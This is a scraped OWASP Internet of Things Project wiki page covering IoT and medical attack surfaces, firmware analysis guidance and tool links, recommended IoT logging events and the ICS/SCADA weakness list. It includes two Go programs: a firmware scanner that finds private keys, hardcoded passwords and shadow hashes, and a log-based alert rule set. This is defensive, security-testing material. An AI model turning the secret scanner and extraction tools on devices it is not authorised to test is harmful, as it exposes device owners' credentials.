| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way for people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
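Several of the Manufacturer Recommendations above (no hardcoded passwords or hashes, no encryption key exposure, no backdoor accounts) can be checked mechanically against an extracted firmware file system before a release ships. The following Go program is an added example written for this page; it is not Firmwalker or any other tool listed in the table. It walks an extracted root, flags private key material, hardcoded passwords in configuration files, credentials embedded in URLs, and shadow/passwd entries that carry a pre-set password hash, and builds a small constructed sample tree so that it runs offline. The patterns, file names and sample content are assumptions; the sample key body and hash are not real.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Added illustration, not Firmwalker or any other tool listed on this page: a
// minimal scan of an extracted firmware root for the sensitive-data items above.
// The patterns, file names and sample tree are assumptions.

type Finding struct {
	Path   string
	Line   int
	Reason string
}

var checks = []struct {
	reason string
	re     *regexp.Regexp
}{
	{"private key material", regexp.MustCompile(`-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----`)},
	{"hardcoded password in config", regexp.MustCompile(`(?i)^\s*(pass(word|wd)?|secret|api[_-]?key)\s*[=:]\s*\S+`)},
	{"credentials embedded in URL", regexp.MustCompile(`[a-z]+://[^/\s:@]+:[^@\s]+@`)},
}

// shadowRe matches a shadow/passwd entry whose password field is a real hash (not "*", "!" or empty).
var shadowRe = regexp.MustCompile(`^([^:]+):(\$[^:]+|[^:*!]{13,}):`)

func scanFile(path string) ([]Finding, error) {
	data, err := os.ReadFile(path)
	if err != nil {
		return nil, err
	}
	isAccounts := filepath.Base(path) == "shadow" || filepath.Base(path) == "passwd"
	var out []Finding
	for i, line := range strings.Split(string(data), "\n") {
		if isAccounts {
			if m := shadowRe.FindStringSubmatch(line); m != nil {
				out = append(out, Finding{path, i + 1, "pre-set password hash for account " + m[1]})
			}
			continue
		}
		for _, c := range checks {
			if c.re.MatchString(line) {
				out = append(out, Finding{path, i + 1, c.reason})
			}
		}
	}
	return out, nil
}

// ScanFirmwareTree walks an extracted root file system and returns every finding.
func ScanFirmwareTree(root string) ([]Finding, error) {
	var all []Finding
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil || !d.Type().IsRegular() {
			return err
		}
		found, err := scanFile(p)
		all = append(all, found...)
		return err
	})
	return all, err
}

// WriteSampleTree creates a constructed mini root with the artefacts the scan
// should flag; the key body and the hash are placeholders, not real secrets.
func WriteSampleTree(dir string) error {
	files := map[string]string{
		"etc/shadow":           "root:$6$saltsalt$constructedhashvalue:18000:0:99999:7:::\nnobody:*:18000:0:99999:7:::\n",
		"etc/config/mqtt.conf": "broker = mqtts://device:Factory123@broker.example.net\npassword = Factory123\n",
		"etc/ssl/server.key":   "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedkeybodyNOTAREALKEY\n-----END RSA PRIVATE KEY-----\n",
	}
	for rel, body := range files {
		p := filepath.Join(dir, filepath.FromSlash(rel))
		_ = os.MkdirAll(filepath.Dir(p), 0o755) // WriteFile reports a missing directory
		if err := os.WriteFile(p, []byte(body), 0o644); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	dir, _ := os.MkdirTemp("", "fwscan")
	defer os.RemoveAll(dir)
	if err := WriteSampleTree(dir); err != nil {
		panic(err)
	}
	findings, _ := ScanFirmwareTree(dir)
	for _, f := range findings {
		fmt.Printf("%s:%d: %s\n", f.Path, f.Line, f.Reason)
	}
}
```

Point ScanFirmwareTree at a directory produced by one of the extraction tools listed above to run it on a real image; the shadow check deliberately ignores locked accounts ("*" or "!" in the password field), since only an entry with a usable hash is a pre-set credential.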
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events ==<br />
<br />
This is a working draft of the recommended minimum logging events for IoT devices. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
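To show how the events in this table become detections, the following Go program is an added example, not part of the OWASP project: it replays a constructed log excerpt (an assumed key=value line format) and raises alerts for Multiple Failed Passwords, High Rate of Login Attempts, Device Accessed Using Default Administrative Credentials, and Source Location Changes During Session. The line format, thresholds, addresses and session id are all assumptions.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// Added illustration, not part of the OWASP project: a small rule set over
// constructed device log lines (assumed "key=value" fields) that raises alerts
// for four event types in the table above. Thresholds are assumptions.

// SampleLog is a constructed excerpt from one device's log.
var SampleLog = []string{
	"ts=2019-11-01T07:00:01Z dev=cam-17 ev=auth_fail src=203.0.113.5 user=admin",
	"ts=2019-11-01T07:00:03Z dev=cam-17 ev=auth_fail src=203.0.113.5 user=admin",
	"ts=2019-11-01T07:00:05Z dev=cam-17 ev=auth_fail src=203.0.113.5 user=admin",
	"ts=2019-11-01T07:00:07Z dev=cam-17 ev=auth_fail src=203.0.113.5 user=admin",
	"ts=2019-11-01T07:00:09Z dev=cam-17 ev=auth_ok src=203.0.113.5 user=admin cred=default",
	"ts=2019-11-01T07:00:20Z dev=cam-17 ev=request src=203.0.113.5 session=s1 path=/config",
	"ts=2019-11-01T07:01:40Z dev=cam-17 ev=request src=198.51.100.9 session=s1 path=/config",
	"this line is malformed and must be skipped",
}

type Alert struct {
	Category string
	Detail   string
}

const (
	failThreshold = 3                // "Multiple Failed Passwords"
	rateThreshold = 5                // attempts per source within rateWindow
	rateWindow    = 60 * time.Second // "High Rate of Login Attempts"
)

// ParseLine splits "k=v k=v ..." into a map; any field without "=" rejects the line.
func ParseLine(line string) (map[string]string, bool) {
	ev := map[string]string{}
	for _, f := range strings.Fields(line) {
		kv := strings.SplitN(f, "=", 2)
		if len(kv) != 2 {
			return nil, false
		}
		ev[kv[0]] = kv[1]
	}
	_, ok := ev["ev"]
	return ev, ok
}

// Detect replays the lines in order; each counting rule fires once, when its threshold is first reached.
func Detect(lines []string) []Alert {
	var alerts []Alert
	failsByUser := map[string]int{}
	attemptsBySrc := map[string][]time.Time{}
	sessionSrc := map[string]string{}
	for _, line := range lines {
		ev, ok := ParseLine(line)
		ts, err := time.Parse(time.RFC3339, ev["ts"])
		if !ok || err != nil {
			continue
		}
		switch ev["ev"] {
		case "auth_fail", "auth_ok":
			if ev["ev"] == "auth_fail" {
				if failsByUser[ev["user"]]++; failsByUser[ev["user"]] == failThreshold {
					alerts = append(alerts, Alert{"Authentication Exceptions", "Multiple Failed Passwords for user " + ev["user"]})
				}
			}
			// Sliding window of login attempts per source address.
			src, kept := ev["src"], attemptsBySrc[ev["src"]][:0]
			for _, t := range attemptsBySrc[src] {
				if ts.Sub(t) <= rateWindow {
					kept = append(kept, t)
				}
			}
			attemptsBySrc[src] = append(kept, ts)
			if len(attemptsBySrc[src]) == rateThreshold {
				alerts = append(alerts, Alert{"Authentication Exceptions", "High Rate of Login Attempts from " + src})
			}
			if ev["ev"] == "auth_ok" && ev["cred"] == "default" {
				alerts = append(alerts, Alert{"Administrative Mode Events", "Device Accessed Using Default Administrative Credentials by " + ev["user"]})
			}
		case "request":
			sid, src := ev["session"], ev["src"]
			if first, known := sessionSrc[sid]; !known {
				sessionSrc[sid] = src
			} else if first != src {
				alerts = append(alerts, Alert{"Session Exceptions", fmt.Sprintf("Source Location Changes During Session %s: %s -> %s", sid, first, src)})
			}
		}
	}
	return alerts
}

func main() {
	for _, a := range Detect(SampleLog) {
		fmt.Printf("[%s] %s\n", a.Category, a.Detail)
	}
}
```

Run as written it prints four alerts. The rules only work because the device emits the fields they key on (source address, user, outcome, session id, whether a default credential was used), which is the practical argument of this project: the detection is cheap once the events exist.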
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization, supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246177OWASP Internet of Things Project2018-12-19T23:26:09Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
